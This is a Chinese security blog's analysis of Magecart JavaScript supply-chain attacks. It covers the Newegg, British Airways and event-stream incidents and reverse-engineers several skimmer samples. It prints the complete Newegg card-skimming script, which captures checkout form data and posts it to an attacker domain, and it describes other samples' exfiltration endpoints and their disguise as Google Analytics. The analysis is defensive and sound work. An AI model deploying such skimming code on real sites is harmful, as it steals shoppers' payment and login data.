技术干货 | JS供应链攻击恶意代码分析 – 作者:riversecurity-安全小百科

JS供应链攻击，或者又叫Magecart攻击，是指通过向第三方JS供应链中注入恶意JS代码，以获取网站的支付信息和用户信息的攻击行为。

Magecart是安全研究人员对至少 11 个不同黑客组织的总称，这些组织专门在电商网站上植入恶意软件代码，悄悄窃取客户的支付信息。

目前，这类攻击正变得越来越频繁，它们主要通过被黑的广告链或者伪造成GoogleAnalytics code来插入电商网站或者大型网站，以窃取用户信息和支付信息。

据相关安全统计，国外已经有大量电商网站遭到这类攻击，并且导致了网站用户信息和支付信息的大规模泄露。

2015年：

Magecart攻击开始活跃，其最初两年的目标是Magento在线商店，2017年底至2018年初开始改变策略，转将目标瞄向主要服务，尤其是托管Web 基础设施。

2018年：

Magecart曾制造过针对英国航空公司、Ticketmaster和 Newegg等知名国际公司网络攻击的大新闻。

9月6日：英国航空公司遭遇黑客攻击，包括个人基本信息和付款记录的客户数据被泄露。

9月13日：Feedify网站被黑客攻击并植入MageCart恶意脚本，该恶意脚本可以窃取用户提交的信用卡资料和其他信息。

9月20日：Newegg网站在被植入用来窃取客户付款信息的MageCart脚本后的一个多月，终于发现其被动的现状。

Magecart黑客还通过将代码插入到Adverline流行的第三方JavaScript 库中，使得277个电子商务网站受到供应链攻击。这些电子商务网站主要提供票务、旅游和航班预订服务，以及一些来自名牌化妆品、医疗保健和名牌服装的自托管购物网站。

黑客攻击团队Magecart Groups 5和Magecart Groups 12通过向JavaScript库注入skimming代码来攻击电子商务网站使用的第三方服务。这使得嵌入脚本的所有网站都可以加载skimming代码。覆盖范围的扩大，也为黑客窃取更多数据提供了便利。

11月21日：

名为FallingSnow的用户在知名JavaScript应用库event-stream的github Issuse中表示发现event-stream中存在用于窃取用户数字钱包的恶意代码。该package中的恶意代码主要作用是：窃取用户的钱包信息（包括私钥），并将其发送到copayapi.host的8080端口上。随后，Right9ctrl发布了包含新依赖关系的Event-Stream 3.3.6 – Flatmap-Stream0.1.1。其中，Flatmap-Stream v0.1.1 正是是包含恶意代码的npm package。

下图是Event-Stream 3.3.6版本的影响范围：

根据这些统计信息不难看出，Magecart攻击的范围随着时间的推移越来越广泛和多种多样，而本文就是针对对攻击注入的恶意JS进行分析，分析其恶意代码和恶意行为，看其是如何获取用户信息和支付信息的。

攻击的恶意代码并不会直接注入被攻击的电网网站，而是会通过JS供应链来进行攻击，例如直接入侵或者利用漏洞注入在线广告公司的第三方JavaScript库，或者伪造成Google Analytics code。例如有的攻击脚本使用了Google Analytics名称的变体，使其看起来不那么可疑，并因此逃避了网站所有者的检测，成功将恶意代码被混淆并注入合法的JS文件。

混淆的代码从www.google-analytics.cm/analytics.js加载，该网址与真正的Google Analytics位置www.google-analytics.com/analytics.js非常相似。但是顶级域名是cm而非com。

如果去分析这些恶意JS样本，会发现一个特点，他们会混淆和伪装成Google Analytics code该有的一些特定特征。下图就是一个混淆伪装之后的js，表面看起来相当复杂，但是如果花时间对其进行分析，就会发现代码中隐藏的恶意行为。

下图是一个简易的攻击图示：

流程说明如下：

攻击者入侵或者通过漏洞在第三广告提供商的JS库中插入恶意代码
如果电商使用了被入侵第三方广告商JS库，恶意JS将会被载入电商的网站中
当用户在登录网站或者支付商品时恶意代码将会获取这些信息
再通过设定好的方式发送到指定的接受处

这里我们先讲一个简单的案例，据网络威胁检测公司Volexity称，国外电商网站Newegg（新蛋网）遭到了Magecart组织的网络攻击，这是继英国航空公司、Ticketmaster、Feedify后，出现的最新受害者。实际上之前我还用过这个电商网站购物，它算是电商界鼻祖级别的购物平台了，但是在国内京东崛起之后它就基本消失了，变得比较小众，估计很多现在的年轻人都没有听说过这个电商平台。

具体来说，Newegg完整的用户信息与银行卡信息在2018年8月16日-9月18日之间被Magecart盗取。攻击者在Newegg网站的结账页面插入了几行恶意Javascript代码，这些网页捕获了在网站上进行购买的客户的付款信息，然后将其发送到私人注册域neweggstats.com。预计有数百万人的银行卡信息被盗取

当用户在Newegg购买商品时，他们首先会被要求填写收货信息，然后跳转至付款页面，输入支付信息。正是在这个Newegg采集付款信息的页面上，被注入了下面显示的15行MageCart脚本。

window.onload=function(){
    jQuery(‘#btnCreditCard.paymentBtn.creditcard’).bind(“mouseptouchend”,function (e) {
        var dati =jQuery(“#checkout”);
        var pdati=JSON.stringify(dati.serializeArray());
        setTimeout(function () {
            jQuery.ajax({
                type:”POST”,
                async:true,
                url:”https://www.neweggstats.com/GlobalData/“,
                data: pdati,
                dataType:’application/json’
            });

        },250);

    });
};

当页面加载时，脚本会将自己绑定到用户输入信用卡详细信息后按下的提交按钮。当提交按钮被按下，脚本就会获取表单的内容。因此在网站被攻击的期间，攻击者可以在不中断结账过程的前提下，悄悄窃取那些从Newegg上购买商品的顾客的信用卡详细信息，并将其转换为JSON，然后上传到https://neweggstats.com/GlobalData站点。这个neweggstats站点并不归Newegg所有，其实际操作者正是攻击者本身。但是，对于用户而言，他们并不会发现购物过程中的任何异常，只会继续购买，就像没有发生任何事情一样。

这个章节我们将对获取到的一些恶意JS样本做详细分析，主要分析这些恶意样本的恶意行为。

该样本是一个获取用户登录信息的恶意js,通过VirusTotal在线威胁情报平台检测可以看到其存在恶意行为：

1. 将样本JS引入到测试HTML中，观察样本JS的结构，发现大部分代码是变量定义，于是从当前JS源文件中的一处循环语句中下一个断点，发现一段中间生成的代码。

2. 把生成的代码放入当前页面中，继续跟踪调试：

3. 简单变量初始化后，有一个IF判断，其实会对当前地址做检测，如下：

4. 此判断条件解密之后如下：

即，判断当前地址中是否包含看起来像电商系统的常用单词，因此我们修改为：

通过修改判断条件为真继续跟踪，发现一个远程连接：

5. 经过一系列的变量定义和转换，跟踪到一个函数(contentcachecontrol)定义，如下：

6. 但是contentcachecontrol本身未定义，可能在其他地方定义，然后观察内部逻辑，发现主要是对nowwork变量进行赋值，所以我们暂时先强制：nowwork = true, 继续跟踪：

7. 发现代码在查找页面中的表单数据，接下来的循环代码会在所有的form中添加eventListener，即监听表单事件，因此我们在测试页面中复制testfire（http://demo.testfire.net）的登录表单：

8. 看到在form的change事件做了监听：

9. 上图即是还原后的代码，我们再查看当form change时localStorage里面的情况

10. 可以看到，样本把整个form数据都存在了localStorage里面，并作了base64转换

11. 最终，当JS样本发现Cache中有值时，向之前发现的远程地址https://content-delivery.cc/cdn/font.js发起post请求，请求数据为上图的内容，包含用户名、密码、域名等用户信息。

第二个样本结构与上一个样本类似，

恶意行为与上一个样本一致，只是远程地址变为了：https://cdn-content.cc/cdn/init.js

这个样本主要就是我们之前提到的伪装混淆成了Google Analytics Code的案例。

1. 跟踪恶意JavaScript代码样本，发现一些可疑字段：

2. 由于不知道判断点，先改文件名称，尝试让样本工作，在文件名中添加了”login”关键字，发现事件监听：

3. 添加了”click”事件，代码如下图：

4. 但是下断点后，未能触发事件，继续分析，发现可能存在判断条件：

5. 发现样本在遍历”input, select, textarea,checkbox”这些标签的行为：

6. 经过反复调试发现无法触发事件，于是使用静态分析方法，直接还原代码，还原出样本行为，还原后的关键代码如下：

7. 根据还原之后的样本对代码进行解读，样本主要行为是在页面的

“button,.form-button,.onestepcheckout-button,.btn,#onestepcheckout-place order,.onestepcheckout-place-order, .onestepcheckout-place-order-wrapper”

中添加click事件，当事件触发时，会执行以下流程：

· 检查window.location是否包含一些关键字，然后遍历页的输入标签，把标签的name及value存在localStorage中，并且把所有标签的name及value赋值给临时变量。
· 在localStorage中生成一个16位随机值的gaudid,如果已经生成过，就不会再变化。
· 检查两个固定标签，推测是此处是针对某指定网站的特定页面，标签ID分别为sectionBillingAddress、sectionDeliveryAddress，看起来与订单地址相关，这两个标签的内容同样被存入localStorage中。
· 取出所有localStorage中的值，并使用GibberishAES.enc加密，密钥为4d25a9bb5f714290adb1********************************************
· 向远程地址发送盗取所有的数据，远程地址为

//g-*******.com/__utm.gif?v=1&_v=j68&a=98811130&t=pageview&_s=1&sd=24-bit&sr=2560×1440&vp=2145×371&je=0&_u=AACAAEAB~&jid=1841704724&gjid=877686936&cid=1283183910.1527732071